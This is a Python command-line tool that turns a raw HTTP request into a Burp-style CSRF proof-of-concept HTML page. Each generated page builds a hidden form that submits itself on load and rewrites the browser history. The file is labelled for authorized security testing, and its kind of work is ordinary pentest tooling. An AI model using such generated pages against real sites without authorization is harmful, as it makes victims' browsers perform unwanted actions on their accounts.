#!/usr/bin/env python3

"""
CSRF PoC Generator — CLI Tool

Matches Burp Suite Professional's "Generate CSRF PoC" output exactly.
For authorized security testing only.
"""

import sys
import os
import argparse
import urllib.parse


# ──────────────────────────────────────────────
# Parsing
# ──────────────────────────────────────────────

def read_raw(source: str) -> str:
    """
    Read raw HTTP request from:
      - a file path
      - '-'  → stdin (piped or interactive multi-line)
    """
    if source == "-":
        if sys.stdin.isatty():
            # Interactive: prompt the user, read until blank line + EOF (Ctrl-D)
            print("[*] Paste your raw HTTP request below.")
            print("    Press Enter twice then Ctrl-D (Linux/Mac) or Ctrl-Z Enter (Windows) when done.\n")
        return sys.stdin.read()
    else:
        if not os.path.isfile(source):
            print(f"[!] File not found: {source}")
            sys.exit(1)
        with open(source, "r") as f:
            return f.read()


def parse_request(raw: str):
    lines = raw.splitlines()

    # Skip any leading blank lines (common when pasting)
    while lines and not lines[0].strip():
        lines.pop(0)

    if not lines:
        print("[!] Empty request.")
        sys.exit(1)

    # Request line: METHOD /path?query HTTP/version
    parts = lines[0].split()
    if len(parts) < 3:
        print(f"[!] Could not parse request line: {lines[0]!r}")
        sys.exit(1)

    method       = parts[0].upper()
    full_path    = parts[1]
    http_version = parts[2]          # HTTP/1.1 or HTTP/2

    headers = {}
    body    = ""
    in_body = False

    for line in lines[1:]:
        if not in_body and line.strip() == "":
            in_body = True
            continue
        if in_body:
            body += line.strip()
        else:
            if ":" in line:
                key, value = line.split(":", 1)
                headers[key.strip().lower()] = value.strip()

    host   = headers.get("host", "")
    scheme = "https" if http_version == "HTTP/2" else "http"

    if "?" in full_path:
        path_only, query_string = full_path.split("?", 1)
    else:
        path_only, query_string = full_path, ""

    base_url = f"{scheme}://{host}{path_only}"
    return method, base_url, query_string, body


# ──────────────────────────────────────────────
# Encoding & HTML building
# ──────────────────────────────────────────────

def parse_params(data: str):
    if not data:
        return []
    return urllib.parse.parse_qsl(data, keep_blank_values=True)


def html_entity_encode(value: str) -> str:
    safe = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_")
    return "".join(c if c in safe else f"&#{ord(c)};" for c in value)


def build_hidden_inputs(params) -> str:
    return "".join(
        f'      <input type="hidden" name="{k}" value="{html_entity_encode(v)}" />\n'
        for k, v in params
    )


# ──────────────────────────────────────────────
# PoC generators
# ──────────────────────────────────────────────

def generate_get_poc(base_url: str, query_string: str) -> str:
    inputs = build_hidden_inputs(parse_params(query_string))
    return f"""<html>
  <!-- CSRF PoC - generated by csrf_poc_gen.py -->
  <body>
    <form action="{base_url}">
{inputs}      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
"""


def generate_post_poc(base_url: str, body: str) -> str:
    inputs = build_hidden_inputs(parse_params(body))
    return f"""<html>
  <!-- CSRF PoC - generated by csrf_poc_gen.py -->
  <body>
    <form action="{base_url}" method="POST">
{inputs}      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
"""


# ──────────────────────────────────────────────
# CLI
# ──────────────────────────────────────────────

BANNER = r"""
  ___ ___ ___  _____   ___  ___ ___    __ _ ___ _ __
 / __/ __| _ \| __| \ / / \/ __|  _|  / _` / -_) '  \
| (__\__ |   /| _|  V /| >  < (_ | _|| (_| \__/ |_|_|
 \___|___|_|_\|_|   \_//_/_/\_\___|___|\__, |\___|_|_|
                                       |___/
 Burp-compatible CSRF PoC Generator
"""

def build_parser() -> argparse.ArgumentParser:
    parser = argparse.ArgumentParser(
        prog="csrf-poc-gen",
        description="Generate a CSRF PoC HTML file from a raw HTTP request.\n"
                    "Matches Burp Suite Professional output exactly.",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
examples:
  # From a saved request file
  csrf-poc-gen request.txt

  # Pipe directly from a file
  cat request.txt | csrf-poc-gen -

  # Interactive paste mode (run, paste, Ctrl-D)
  csrf-poc-gen -

  # Custom output filename
  csrf-poc-gen request.txt -o /tmp/my_poc.html

  # Print PoC to stdout instead of saving
  csrf-poc-gen request.txt --stdout

  # Pipe Burp's clipboard output straight through
  xclip -o | csrf-poc-gen -
        """
    )
    parser.add_argument(
        "input",
        metavar="REQUEST",
        help="Path to a raw HTTP request file, or '-' to read from stdin (paste/pipe)"
    )
    parser.add_argument(
        "-o", "--output",
        metavar="FILE",
        default="csrf_poc.html",
        help="Output file path (default: csrf_poc.html)"
    )
    parser.add_argument(
        "--stdout",
        action="store_true",
        help="Print the generated PoC to stdout instead of writing a file"
    )
    parser.add_argument(
        "--no-banner",
        action="store_true",
        help="Suppress the ASCII banner"
    )
    return parser


def main():
    parser = build_parser()
    args   = parser.parse_args()

    if not args.no_banner and not args.stdout:
        print(BANNER)

    try:
        raw = read_raw(args.input)
        method, base_url, query_string, body = parse_request(raw)

        if method == "GET":
            html       = generate_get_poc(base_url, query_string)
            param_keys = [k for k, _ in parse_params(query_string)]
        elif method == "POST":
            html       = generate_post_poc(base_url, body)
            param_keys = [k for k, _ in parse_params(body)]
        else:
            print(f"[!] Unsupported HTTP method: {method}")
            sys.exit(1)

        if args.stdout:
            print(html)
        else:
            with open(args.output, "w") as f:
                f.write(html)
            print(f"[+] PoC saved  : {args.output}")
            print(f"    Method     : {method}")
            print(f"    Target     : {base_url}")
            print(f"    Parameters : {param_keys}")

    except KeyboardInterrupt:
        print("\n[!] Aborted.")
        sys.exit(1)
    except Exception as e:
        print(f"[!] Error: {e}")
        sys.exit(1)


if __name__ == "__main__":
    main()